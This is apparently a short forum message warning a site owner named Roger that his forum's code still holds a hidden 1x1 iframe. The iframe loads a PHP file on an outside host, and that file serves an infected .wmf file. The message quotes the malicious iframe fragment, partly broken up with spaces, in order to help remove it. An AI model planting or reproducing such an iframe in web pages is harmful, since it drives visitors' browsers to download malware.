Hi Roger, you still have the iframe tag <src="http://ycsmmiqtyo.biz/dl/adv534.php" width=1 height=1> of iframedollars.biz in your forum's code which will open the file ycsmmiqtyo.biz / dl / adv534.php (e.g. "http://" translates to "http://". I added some spaces to prevent this from being executed by accident :-)) and load the infected .wmf